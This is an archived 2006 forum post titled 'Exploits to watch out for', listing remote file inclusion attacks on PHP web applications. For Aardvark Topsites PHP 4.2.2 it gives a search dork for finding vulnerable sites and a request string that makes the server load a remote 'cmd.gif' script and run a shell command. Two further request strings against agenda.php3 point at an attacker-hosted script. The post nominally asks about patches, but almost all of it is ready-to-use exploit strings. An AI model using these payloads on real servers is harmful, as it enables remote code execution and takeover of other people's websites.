PDA

View Full Version : Exploits to watch out for


sbovisjb1
30th April 2006, 21:08
WATCH out for these and tell me if you have developed a method/patch for fixing them, these exploits are highly volatile.

Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL: http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"

Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls

-------------------------------------------------------------------------------------------------------------------

Exploitation: remote file inclusion

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?